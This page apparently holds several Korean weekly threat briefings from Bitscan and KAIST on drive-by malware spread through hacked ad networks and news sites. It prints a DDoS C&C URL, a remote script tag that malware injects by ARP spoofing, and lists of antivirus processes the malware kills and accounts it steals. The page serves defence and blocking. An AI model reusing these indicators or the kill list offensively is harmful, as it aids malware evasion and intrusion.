현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 금주의 총평으로는 유명 사이트들도 보안 취약(미스터 피자, 아주대, 이토마토, 두리누리 사회보험), 향후 대형사고가 일어날 것 같은 하인리히의 법칙, 대규모 유포체계의 지속적인 활용, 목적을 가진 다운로더들의 대규모 유포, 봇넷 에이젼트들의 MalwareNet을 활용한 대규모 유포 입니다. 민감한 시기입니다. 적극적인 대응과 노력으로 피해를 예방해야 합 니다. MalwareNet의 활용과 위험에 대해 계속 언급 하였습니다. 그리고 지금 관찰되는 상태는 최종 악성코드의 성격과 범위 모두 일정 수준의 임계치를 넘은 상황입니다.

 

2년 이상을 온라인상에서 꾸준히 공격을 시도하고 있는 공격자들을 모니터링 한 결과에 따르면 공격기법과 기술은 한 주가 다르게 변화하고 진화하고 있습니다. 그 반면에 대응 기술 측면에서는 발전은 지지부진함을 보이고 있습니다. 공격은 적극적인 유포망 확대, 감염 기술의 고도화, 최고 공격기법들의 즉시적인 실전투입으로 귀결이 됩니다.

 

 

발전적인 협력

 

빛스캔의 PCDS에 탐지 및 분석되는 정보들은 현재 최초의 악성링크, 악성링크의 구조정보, 최종 악성파일 보관, 악성파일 변화 관찰, 봇넷 구축을 위해 감염 이후 연결 시도하는 C&C 서버의 정보들이 수집 및 축적되고 있으며 각 부분별로 발전적인 협력을 원하시는 부분에 대해서는 메일로 문의를 주시면 답변 드리겠습니다. (info@bitscan.co.kr)

감사합니다.

 

       본 정보제공 서비스는 공개, 재 배포 금지(내부에서만 활용), 비영리 목적으로만 활용 가능합니다. 공익적인 목적으로 기관에 제공되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

       시범 서비스는 순차적으로 1개월 경과 시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.

       정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/담당자/연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다.

       본 서비스의 권리는 빛스캔에 있으므로 공개적 활용 및 영리적 목적으로 활용 하실 수 없습니다.

       본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre-Crime Detect System)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 정보보호대학원과 공동으로 진행합니다.

 


본 브리핑 및 정보제공 서비스의 신청은 info@bitscan.co.kr 입니다.


[1] 공영방송 KBS 웹사이트 해킹악성코드 유포돼!

http://www.dailysecu.com/news_view.php?article_id=3114

[2] KBS 홈페이지 악성코드 유포정황 드러나 충격!

http://www.boannews.com/media/view.asp?idx=33420&kind=1

[3] 두루누리 사회보험: 대부분의 근로자들이 보험 혜택을 받고 있지만, 가정 어린이집과 같은 소규모 사업장의 보육교사들은 이러한 사업의 혜택을 받지 못하고 있다. 이에 더욱 많은 사람들에게 사회보험 혜택을 주고자 고용노동부, 보건복지부, 근로복지공단, 국민연금공단에서고용보험국민연금의 보험료를 지원해주는 보험입니다.

Posted by 바다란

댓글을 달아 주세요

빛스캔과 KAIST 정보보호대학원이 공동 운영하는 보안정보 제공 서비스 9월 4주차 국내 인터넷 환경의 위협 분석내용이며 본 보고서는 PCDS( Pre Crime Detect System )의 탐지역량과 KAIST 정보보호대학원의 분석역량이 결집된 분석 보고서입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응 방안 제시를 하고 있습니다. 금주 만 추석연휴로 인해 목요일 발송 입니다.

본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영되고 있습니다. 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지
2. 악성링크가 공격에 활용에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 – 패치
3. 내부 감염된 APT 공격의 확인 및 제거에 활용(기술 분석 문서 참고)







9월 4주차는 9월 3주차에 비해 신규 악성링크 수치가 감소하였습니다. 감소한 주된 이유는 중국의 최대 명절인 중추절 연휴(29일~10월 1일)과 국경절 연휴(10월 1일~7일)이 맞물린 결과라고 볼 수 있습니다. 그러나 전년 (2011년) 대비 동일기간 대폭 증가한 양상을 보이고 있어 앞으로가 더 염려스러운 상황입니다. 지난해 중국의 연휴 기간에는 악성코드 유포를 위한 공격이 거의 발생되지 않은 반면에 올해는 전년 대비하여 대폭 증가된 공격 비율을 보이고 있습니다. 평상시 보다 감소된 형태이지만 전년 동기간 대비 증가를 하였다는 것은 이제 공격은 상시적으로 발생됨을 의미하고 있습니다. 연휴 시작일 직전에 감행된 공격에서는 평상시와 다른 형태의 공격이 감지 되어 긴장감이 높은 상태를 유지 할 수 밖에 없었습니다.


9월 4주차 공격 동향에서는 30여 곳의 방송국과 언론사가 연결 되어 있는 타켓형 광고 서비스링크를 통해 국내 주요 백신들에서는 감지 되지 않는 최종 악성코드를 대규모로 유포 하였고 최초 탐지 일시는 9월 28일 저녁 8시에 탐지가 되었습니다. 타켓형 광고 링크에 추가된 악성링크는 KISA로 전달 하여 피해를 예방하도록 하였으며 추석 연휴기간 동안 국내 주요백신에서는 탐지가 되지 않는 상태였고 10.4일 금일 확인 결과 다수의 국내 백신벤더에서 탐지가 됨을 확인 하였습니다. 즉시 백신 업데이트를 통해 악성코드 감염 여부를 확인 하시기를 당부 드립니다.


악성코드 유포에 이용된 타켓광고 링크는 xxx.xxxx.xxxx/xxx/js/ok.js 이며 해당 타켓광고 링크내에 포함 되었던 악성링크는 xxx.xxxx.co.kr/ad/ad.html 입니다. 현재 상태에서는 모두 이상이 없습니다만, 해당 악성링크만 제거 하는 식의 처방으로는 계속 재발될 것으로 판단 됩니다. 이미 권한을 가지고 백도어를 가지고 있을 것으로 강력 하게 의심되는 상황에서 눈에 보이는 것만 제거하는 것은 심각한 문제입니다.

또 다른 특징으로는 Korea를 특징한 DDos 공격 용도의 봇 에이젼트가 유포된 상태이므로 향후 피해 발생에 대해 주의를 기울여야 할 것입니다.

DDos 공격에 이용 되는 봇 Agent의 경우 9월2주차부터 지속적으로 유포되고 있습니다. 금주에 발견된 악성코드는 구글 크롬 브라우저로 위장하였고 C&C서버로 통신( http://ddos.t0539.com:888 888 port)을 하며 HTTP 웹 서버에 대해 Get flooding과 Post flooding DDoS를 공격할 수 있는 기능을 갖추고 있습니다.

해당 악성코드 내부에서 KOREA 라는 단어가 발견된 점으로 미루어 보아 국내를 대상으로 유포 및 공격 의사를 가지고 있는 것으로 판단 됩니다.

기존에 많이 이용되었던 Darkshell 같은 중국발 원격제어도구(RAT, Remote Administration tool)와 유사한 형태를 보이나 HTTP 서버를 대상으로만 하는 DDoS 공격 형태를 보아 HTTP 서버를 공격 목적으로 한 최신 DDoS 변종 악성코드인 것으로 확인됩니다.



<구글 크롬 브라우저로 위장한 악성코드>



<악성코드 내부 문자열 KOREA 포착>


오래 전부터 알려드린 대로 현재 공격자들은 악성코드를 유포하는데 여러 단계를 거친 다단계 유포 통로(MalwareNet)를 적극 활용하고 있습니다. 배너광고 사이트중 한 곳이 해킹을 당해 여러 매체에(유력 언론사 수십, 대형 커뮤니티, 대형 오픈마켓, 파일공유) 동시에 악성코드를 유포한 정황이 포착 되었습니다. 짧은 시간이었지만 광고 사이트에 들어간 링크가 수 많은 웹 사이트에 들어가 있던 점을(그것도 방문자 많은 사이트 중심으로) 상기한다면 수 많은 좀비 PC가 양산되었을 것으로 판단됩니다. 향후 중대한 사건/사고의 이면에는 지금까지 누적되어 있던 다양한 위험요소들이 결정적인 영향들을 미치게 될 것입니다. 사전에 위험을 줄이지 않는다면 감당하기 어려운 상황에 수시로 직면하게 될 것입니다.



9월 3주차에 이어 금주에도 PC에 설치되는 최종 악성코드 기능에 ARP 스푸핑을 통한 웹페이지 변조 후 <script language=JavaScript src=http://xxx.xxxxxxggas.net//tj.js> </script>를 삽입하는 형태가 발견 되었습니다. 같은 네트워크 PC중 단 한 대만 감염되더라도 같은 네트워크를 쓰고 있는 모든 PC들이 공격자가 변조한 웹 페이지로 접속하는 형태가 나타나므로 ISP 및 기업/기관에서는 해당 주소에 대한 모니터링 강화가 필요해 보입니다.


ARP 스푸핑을 이용하는 공격코드의 기능은 현재까지는 135, 445 포트를 통해 내부 IP 대역까지 검사하며 정상적으로 다운로드가 될 경우(xxx.xxxxxxmuli.com)122.225.112.xxx 에 감염PC의 맥어드레스와 PC이름을 보낸 후 Updateok라는 메시지를 보내어 공격자들은 감염된 PC에 대한 통계 정보를 끊임없이 수집하고 형태를 보이고 있습니다.


금주에 발견된 최종 악성코드의 특징으로는 분석방해를 위해 악성코드 분석에 사용되는 가상머신 여부를 확인하며, 악성코드 분석할 때 사용하는 디버거의 동작 여부를 확인하고 만약 확인이 되었을 시 악성코드 분석을 방해하기 위하여 블루스크린을 일으킴으로써 분석을 방해하고 적극적으로 회피하는 형태가 계속 발견 되고 있습니다. 다단계 유포통로 (MalwareNet)을 활용한 악성코드 유포 시도도 매우 활발 하였으며, 이제는 유포통로의 확산 이후의 과정인 적극적인 활용 단계에 돌입한 것으로 판정하고 있습니다. 백도어 및 루트킷 형태의 악성코드들도 다단계 유포통로를 이용하여 유포 된 정황이 발견 되었으므로 향후 추가적인 이슈 및 사건.사고 발생이 예상 되고 있습니다. 각 기업 및 기관에서는 주의가 필요합니다.


현재 빛스캔에서 탐지하는 유형은 단순히 이메일을 통한 타켓형 APT가 아닌 웹서비스를 방문하는 모든 방문자를 대상으로 한 대규모 유포이며, 확산도가 높아서 위험성이 높은 상태입니다. 따라서 기업/기관별로 인터넷 접근 시에 많은 보호대책을 적극 반영 하여 대응을 하셔야 할 것으로 보입니다.


기존 악성코드들의 분석 결과도 단순 게임계정 탈취에서 계속 변화하는 형태를 보이고 있어 앞으로의 변화를 가늠하기 어려운 상황입니다. 이미 농협의 사례를 통해 APT나 내부망을 공격 하는 악성코드가 가진 위험성과 파괴력은 충분히 경험을 한 상태이므로 현재 웹서비스를 통해 감염시도를 하는 악성코드 자체의 위험성은 높은 수준이라 할 수 있습니다.



금주 공격의 특징을 정리하면 다음과 같습니다.

  • 9월 2주차와 9월 3주차부터 지속적으로 DDoS 악성코드 유포 - 악성코드 내부 KOREA 발견된 점으로 미루어 보아 향후 국내를 대상으로 공격이 이루어질 가능성 농후
  • 광고 사이트 해킹 및 국내 유력 사이트들 대상으로(유력 언론사 수십 여곳, 대형 커뮤니티, 대형 오픈마켓, 파일공유) 악성코드 대규모 유포 시도

  • 9월 4주차 중국의 최대 명절인 중추절 연휴(29일~10월 1일)과 국경절 연휴(10월 1일~7일)이 맞물린 결과 악성링크 수치 감소, 전년 동기간 대비하여서는 대폭 증가된 수치임. ( 2011년 연휴시기엔 공격이 전무) 따라서 향후 지속적인 위험이 계속 될 것으로 예측됨
  • 8월 3주차 대거 관찰된 루트킷, 백도어 유형의 경우 금주 차 활동 계속 – 부가적인 위험 증가 ( 감염된 좀비PC들을 활용한 추가 위험이 발생 할 수 있는 상태)
  • APT 형태의 악성코드 유포 계속 - 권한 획득, 내부망 스캔 , 추가 코드 다운을 위한 다운로더 다수 확인 지속
  • MalwareNet( 다단계 유포통로)을 적극 활용한 루트킷 및 백도어의 유포 시도 활성화 
  • 3.4 및 7.7 DDos 형태와 유사성을 지니는 다운로더 발견의 급증 ( 긴장을 늦춰선 안되겠습니다. 당장이라도 발생 가능한 상황입니다. )
  • 최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태 및 다양한 취약성을 공격하는 복합적인 형태의 악성링크 공격 확대 계속. 다단계 유포 형태를 띄고 있으며, 탐지 및 추적에 어려움이 예상됨
  • 백신에 탐지 되지 않는 다운로더 백도어 형태의 악성코드 유포 계속
  • 게임 계정 이외에 문화상품권 및 게임 머니 거래 사이트에 대한 계정 탈취 형 악성코드 계속
  • 백신 업데이트 주소 목록을 내장한 악성코드 발견 계속. 향후 추가적 피해 예상됨

* 최근 언론상에 많이 나타나고 있는 은행권에 대한 Host file 변조를 통한 피싱 공격은 이미 5.6정보제공 서비스에서 언급을 드렸던 부분으로서 당시 상당수의 악성코드가 유포 되었을 것으로 추정이 되며, 이후 피해가 지금에서야 계속 드러나는 것으로 볼 수 있습니다. 백신들에 대한 업데이트 주소 변경 내용들도 마찬가지 입니다. 예상해 드린 대로 직접적인 ARP 스푸핑 공격코드 출현 하였으므로 피해 발생 예정입니다. 이 모든 것들은 이미 악성코드의 유포 단계에서 사전 분석되어 정보 제공이 된 내용입니다.



본 서비스에서 제공되는 정보들은 시일이 지날 수록 영향력이 계속 커질 수 밖에 없는 정보들에 대한 분석이 주된 내용입니다. 항상 한달 가량의 보고서 내용들을 살피시고 계속적으로 대응을 하시면 문제 부분을 줄일 수 있습니다. 모든 부분에 있어서 사후 대응 아닌 사전 대응으로 피해를 예방 하도록 하는 것이 핵심 입니다.



*MalwareNet ( 범위와 변화)


- MalwareNet: 공격자들이 공격효과를 높이고 탐지를 회피하기 위해 활용하고 있는 악성코드 유포 네트워크를 의미합니다. 일반적인 사이트에 악성링크를 직접 입력 하는 것이 아닌 몇 단계를 거친 링크들을 입력하여 추적을 회피하고 악성코드 유포 효과를 극대화 하기 위해 사용 되는 프레임을 MalwareNet으로 정의 하고 있습니다. 즉 단 한번 악성링크의 내용을 변경하면 최대 300에서 최소 10여 곳에 이르기까지 동시에 동일한 악성코드 유포가 발생 되는 상황을 나타내고 있습니다.


본 정보제공 서비스에서는 MalwareNet의 특성상 대규모 피해가 상시적으로 발생 될 수 있으므로 상위 리스트에 한해 부분 공개를 하고 있습니다.

MalwareNet 통해 영향력을 가지는 악성링크들은 탐지 회피를 위해 비정기적이고 수시로 변경됩니다. 차에서는 사후 대응으로는 탐지할 없는 형태인 MalwareNet 활용 사례를 살펴 보겠습니다. 공격자의 의도에 의해 조종당하고 있는 현실에서 대응 사전대응의 차이는 매우 차이를 가질 으며 , 선제적인 사전대응이 얼마나 중요한지 확인 있습니다.

MalwareNet 자체를 여러 곳 활용 하는 형태도 전주에 이어 계속 발견 되고 있으며, 2012년 2월에 최초 발견된 Malwarenet인 xxxx.xxxx.kr/main.htm 의 경우 현재 재활성화되어 적극적으로 이용이 되고 있는 상황입니다. 현재 시간에도 영향력을 유지하고 있으므로 대응이 필요하며 수시로 최종 악성코드들이 변경 되고 있어서 탐지 및 대응에 어려움이 있을 것으로 판단됩니다. 최종 악성코드들에 대한 탐지율도 높지 않아 항상 위험에 노출 되어 있는 상태라 볼 수 있습니다. 단기간에 대규모 유포망 구축을 하는 형태가 끊임없이 관찰이 되고 있습니다. 주중에는 통계정보를 수집하고 간헐적으로 공격에도 이용 되고 있는 형태를 보이고 있습니다. 전주에 이어 계속 증가되는 형태를 보이고 있으며, 주중에도 계속 활용 되고 있는 요주의 MalwareNet으로 알려 드립니다. 전주에 이어 계속 증가 추세를 보이고 있는 상황이라 향후 관찰에 집중을 해야 하는 MalwareNet 입니다. 평상시에는 해당 링크가 존재하지 않다가 공격 시점에만 활성화되고 있는데 이 점은 공격자가 해당 서비스에 대한 완벽한 권한을 행사하고 있음을 의미 합니다. 단순한 링크 삭제로는 해결책이 되지 않음을 염두에 두어야 할 것입니다.


*PCDS Impact Factor는 내부 수집된 체계에서 전파 범위를 고려한 내부 위험지수이며 MalwareNet의 추적과 영향도 추적을 위해 활용 되는 수치입니다. 높을 수록 은밀하면서도 파급력이 높은 상태라는 점을 의미하고 있습니다.





Impact 지수는 97을 나타내고 있으며, 다수의 MalwareNet을 또 하위 유포채널로 유지하고 있는 형태를 지니고 있어서 공격자는 단 한번의 변경만으로도 최소 90여 곳 이상의 웹서비스에서 동시에 동일한 악성코드를 배포할 수 있는 상태입니다.

현재의 상황은 사용자 PC에 설치되는 악성코드들은 항상 백신을 우회해서 설치가 되고 또 계속해서 변형들이 출현하고 있는 현 상황에서 웹 서핑만 해도, 웹 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐하고 있습니다. 기본적인 문제를 해결 할 수 있는 보안패치는 반드시 적용 해야만 위험을 줄일 수 있으니 반드시 기관/ 기업 내부적으로 강력한 권고가 되어야 합니다. Oracle Java취약성, Adobe Flash 취약성 , MS XML , Midi IE 취약성이 복합적으로 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

  • 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록 등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하세요.
  • 기술 분석 보고서에 전체 URL이 공개된 국내 사이트들은 악성링크로 직접 이용 되거나 최종 악성코드가 다운로드 된 곳들의 주소는 여과 없이 공개가 되고 있으니 참고하시고 금주 차에는 언론사 및 국내 기업, 기관들의 주소가 직접 기술 되어 있습니다.
  • 기술분석보고서에 언급된 게임계정 유출 악성코드들은 전체 악성코드의 80% 이상이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있습니다. 현재 가장 다수를 차지하는 게임계정 탈취형 악성코드들이 변화된 형태를 보이고 있으며 외부 도메인 연결과 업데이트를 통해 다른 형태로전환이 계속 되고 있습니다. – 8월 2주차 부터 관찰된 변화는 금주 차에도 계속 되고 있습니다.

PCDS 상에서는 최초 악성링크 탐지와 MalwareNet에 대한 추적, 최종 악성파일에 대한 수집까지 같이 운영이 되고 있습니다.

PCDS에 탐지된 내용을 바탕으로 하여 공격자들의 전략을 확인해 보면, 비정기적이고 수시로 악성링크와 최종 악성코드를 바꾸고 있습니다. 변경하는 이유는 백신 탐지 회피를 하기 위한 목적이 가장 크며, 때로는1시간에 한 번씩 최종 악성코드를 변경하는 지금의 상황에서 대응이 가능한 보안체계는 거의 없습니다. 백신은 백신만의 역할 부분이 있으며, 현재 상태의 문제 해결을 위해서는 확산 이전에 대응을 할 수 있어야 합니다. 최종 설치되는 바이너리의 변화는 계속 되고 있으므로, 대응적인 측면에서 한계를 보일 것으로 판단됩니다.




<빛스캔 PCDS를 활용한 동일 악성링크를 통해 배포된 최종 악성코드 변경 수집 내역>

* 최종 바이너리 수집의 경우 체크섬 값이 다르거나 변경이 되었을때 수집이 되도록 되어 있으며 위의 항목은 빠르면 30분 이내에도 최종 파일을 변경하는 형태를 직접 볼 수 있습니다. 이와 같은 악성코드들이 순식간에 수십여 곳의 서비스를 통해 즉시 감염을 시키고 있는 것이 현실입니다.


지금 분석되고 예상되는 모든 내용들은 지금 이 순간에도 발생 하고 있는 현실입니다. 사건이 발생 된 이후에는 돌이키기 어렵듯이 사전 탐지와 사후 대응은 전혀 다른 범위입니다. 사전에 얼마나 대응을 하느냐가 가장 중요하며, 빠른 정보를 확보하여 대규모로 유포된 악성코드에 대응 할 수 있도록 사후대응 측면에서도 현재 수준 보다는 강도 높은 방안들이 절실히 요구됩니다.


*게임 계정 탈취 및 백신 Kill , 게임 머니 및 아이템 거래 사이트 계정탈취 계속

* 본 내용은 최근의 악성코드들이 기본적으로 탑재하고 있는 기능이며 6 4주차 까지 발견 되었던 백신과 게임 계정 탈취 이외에도 문화상품권과 게임 머니 사이트에 대한 계정 탈취 기능이 추가 되었습니다. 모든 기능은 BHO 관련된 공격에 연관 되어 있으며 해당 문제들은 이전 보고서에 첨부된 BHO 공격에 대한 전문분석 자료를 참고 하세요. ( 정식구독 기업/ 기관 대상)신규 가입 및 최근가입으로 인하여 전문분석 보고서를 받지 못한 곳들은 본 메일로 회신을 주시면 전달 드리겠습니다.


금주에 신용정보 조회, 아이템 매니아, 아이템 베이 사이트까지 계정 탈취 기능이 추가 되었습니다. 신용정보 조회 사이트에서 자신의 신용정보를 검색하다가는 자신의 개인정보가 노출될 수도 있습니다. 또한 아이템 매니아, 아이템 베이 사이트는 온라인 게임 아이템 거래 사이트입니다. 게임 계정을 탈취해서 아이템을 판매하던 공격자들이 이제는 게임 계정 탈취 이외에도 게임 아이템 거래 사이트까지 노리고 있습니다. 돈이 되는 곳은 모두가 대상이 되어 있는 상태입니다. 다른 모든 기기와 장비들에서도 금전화가 가능한 순간부터 현재의 공격 수준은 그대로 확장이 될 것입니다. 아직은 때가 안되었을 뿐입니다.


분 류

프로세스명

프로그램명

백 신

sgbider.exe, vcsvc.exe, vcsvcc.exe

바이러스체이서

NVCAgent.npc, Nsvmon.npc, Nsavsvc.npc, NVC.npc, NaverAgent.exe

네이버백신

V3sp.exe, V3svc.exe, V3up.exe, MUpdate2.exe, SgSvc.exe, Sgui.exe,

SgRun.exe, InjectWinSockServiceV3.exe,

V3Light.exe, V3LTray.exe, V3Lsvc.exe, V3LRun.exe

AhnLab V3

AhnLab V3 Lite

AhnLab SiteGuard

AYUpdSrv.aye, AYRTSrv.aye, SkyMon.exe,

AYServiceNT.aye, AYupdate.aye, AyAgent.aye

알약 (ALYac)

avp.exe

Kaspersky

avgnt.exe, avcenter.exe, avguard.exe, avscan.exe, avupgsvc.exe

Avira AntiVirus

avwsc.exe, AvastSvc.exe, ashUpd.exe, AvastUI.exe

avast!

shstat.exe, Mctray.exe, UdaterUI.exe

McAfee

msseces.exe

MSE

egui.exe, ekrn.exe

ESET NOD32

ccSvcHst.exe, Navw32.exe

Symantec Norton

updatesrv.exe, vsserv.exe, seccenter.exe, bdagent.exe, bdreinit.exe

BitDefender

avgam.exe, avgemc.exe, avgnsx.exe, avgrsx.exe

avgfrw.exe, avgwdsvc.exe, avgupd.exe

AVG

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com, id.hangame.com

한게임

laspoker.exe

한게임 라스베가스포커

duelpoker.exe

한게임 맞포커

hoola3.exe

한게임 파티훌라

highlow2.exe

한게임 하이로우

poker7.exe

한게임 7포커

baduki.exe

한게임 로우바둑이

ExLauncher.exe, TERA.exe, tera.hangame.com

테라

netmarble.net

넷마블

pmang.com

피망

ff2client.exe, fifaonline.pmang.com

피파 온라인2

Raycity.exe

레이시티

www.nexon.com, login.nexon.com

넥슨

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe, dragonnest.nexon.com

드래곤 네스트

baramt.exe, WinBaram.exe, baram.nexon.com

바람의 나라

mabinogi.nexon.com, heroes.nexon.com, heroes.exe

마비노기 영웅전

MapleStory.exe, maplestory.nexon.com

메이플 스토리

x2.exe, elsword.nexon.com

엘소드

dk.halgame.com, dkonline.exe

DK 온라인

clubaudition.ndolfin.com

클럽 오디션

www.capogames.net, samwinfo.capogames.net

삼국지w

fairyclient.exe

로한

plaync.co.kr

엔씨소프트

bns.plaync.com

블레이드 & 소울

lin.bin

리니지

AION.bin, aion.plaync.jp

아이온

kr.battle.net

블리자드 배틀넷

wow.exe

월드 오브 워크래프트

Diablo III.exe

디아블로III

게임 머니&

게임 아이템

&문화상품권

www.booknlife.com

북앤라이프

www.cultureland.co.kr

컬쳐랜드

www.happymoney.co.kr

해피머니

www.teencach.co.kr

틴캐시

auth.siren24.com

신용정보 조회

itemmania.com

아이템 매니아

www.itembay.com

아이템 베이



*차단 권고 대역


아래 영역은 이미 공격자가 권한을 통제하고 있는 IP역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다.기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각 기관 및 기업별 검토 필요)차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다. 악성링크에 이용 되는 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해 강력한 차단을 유지하실 것을 권고 합니다.

* 기술 분석 보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 적극 활용 바랍니다.

* 국내 통신사의 경우 C Class가 아닌 직접 IP를 등록 하였으며 이미 공격자가 권한을 가진 상태에서 악성코드 유포 경로로 직접 활용하고 있는 상태여서 제한적인 차단이 필요하며, 업무와 연관성이 있는지 여부는 각 기업 및 기관에서 잘 판단 하셔서 차단에 활용 하시기 바랍니다. 9월 4주차부터 차단 권고 대역은 최근 1~2개월을 기준으로 전달 드리도록 하겠습니다. 이전의 차단 목록이 필요한 기업 및 기관은 info@bitscan.co.kr로 요청해 주세요.


* 전체 차단이 필요한 영역중 하나만 예시로 브리핑에서 제공 합니다.




- 205.209.145.x

 DCS Pacific Star, LLC (California, USA) 9/4




*악성코드 감염 이후 접속 URL - 차단 및 모니터링 필요한 부분


본 내용은 악성코드가 PC에 감염된 이후에 외부로 연결 시도를 하고 명령을 받는 주소들입니다. C&C 연결을 시도하는 봇넷과 같은 개념으로 볼 수 있습니다. C&C 서버의 차단과 관련된 핵심적인 내용입니다. 차후 별도 차단 서비스를 기획하고 있으며 해당 내용은 별도 서비스 확산 시에 보고서 상에서만 일부 제공 될 예정입니다. 실험적으로 Outbound 연결 시에 Destination IP가 본 URL일 경우는 100% 좀비 PC백도어,루트킷 등에 감염된 것이므로 직접 내부망에서 감염된 좀비 PC를 찾아내는 것이 가능해 집니다. 기술 분석 보고서 내에는 추가적인 차단 정보들이 존재함으로 확인 하시고 적용 하시는 것이 필요합니다.


 http://ddos.t0539.com:888 -즉시차단 권고 ( DDoS C&C 서버 주소)


실제 보고서 및 메일에는 50여개의 연결 URL 및 IP 정보들이 언급 되어 있습니다.

브리핑에서는 예시로 핵심적인 하나만 언급 합니다.


현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 금주의 총평으로는 한국을 대상으로 한 것이 명백한 DDoS 공격용 Agent 발견, 타켓 광고 링크를 이용한 순간적인 악성코드 대규모 유포 이슈 (방송국 및 언론사 다수),3.4 7.7 DDoS 공격 형태의 업데이트 패턴 관찰 계속됨, 대규모 유포체계의 다수 활용, 마지막으로 전년 대비 이상증세를 보이고 있는 추석 연휴의 공격 (전년 동기간 대비 급증) 입니다.

추석연휴에도 공격이 지속 되었다면 향후 공격의 강도는 더욱 거세질 것으로 판단되며, 최종 악성코드가 단순한 게임계정 탈취만이 아닌 다른 유형으로 계속 발견 되고 있어서 위험은 계속 되고 있습니다. 2년 이상을 온라인상에서 꾸준히 공격을 시도하고 있는 공격자들을 모니터링 한 결과에 따르면 공격기법과 기술은 한 주가 다르게 변화하고 진화하고 있습니다. 그 반면에 대응 기술 측면에서는 발전은 지지부진함을 보이고 있습니다. 공격은 적극적인 유포망 확대, 감염 기술의 고도화, 최고 공격기법들의 즉시적인 실전투입으로 귀결이 됩니다.



빛스캔의 PCDS에 탐지 및 분석되는 정보들은 현재 최초의 악성링크, 악성링크의 구조정보 , 최종 악성파일 보관 , 악성파일 변화 관찰, 봇넷 구축을 위해 감염 이후 연결 시도하는 C&C 서버의 정보들이 수집 및 축적되고 있으며 각 부분별로 발전적인 협력을 원하시는 부분에 대해서는 메일로 문의를 주시면 답변 드리겠습니다. (info@bitscan.co.kr)

감사합니다.






*본 정보제공 서비스는 공개, 재배포 금지( 내부에서만 활용), 비영리 목적으로만 가능합니다.

공익적인 목적으로 기관에 제공 되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

*시범 서비스는 순차적으로 1개월 경과 종료 됩니다. 4 이상을 보고서를 받으셨다면 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.

* 정식 구독 서비스 가입 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 서비스의 권리는 빛스캔에 있으므로 공개적 활용 영리적 목적으로 활용 하실 없습니다.

* 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system) 통해 수집하며, 악성링크 악성코드 분석은 KAIST 정보보호대학원과 공동으로 진행합니다.


Posted by 바다란

댓글을 달아 주세요

모든 URL과 차단에 필요한 IP 정보들은 정식 보고서와 브리핑에만 기술 됩니다.

공개 게시물에는 표시 되지 않습니다. 상세한 악성링크의 구조 분석과 실제 악성코드의 행위에 대한 분석들도 보고서에만 기술 되어 있습니다.


--------------------------

빛스캔과 KAIST 사이버보안연구센터에서 공동 운영하는 보안정보 제공 서비스 7월 3주차 국내 인터넷 환경의 위협 분석 내용이며 본 보고서는 빛스캔의 PCDS( Pre Crime Detect System )의 탐지역량과 KAIST 정보보호대학원, 사이버보안센터의 분석 역량이 결집된 분석 보고서입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응을 하도록 방향 제시를 하고 있습니다.

본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영되고 있습니다.

본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

  1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지
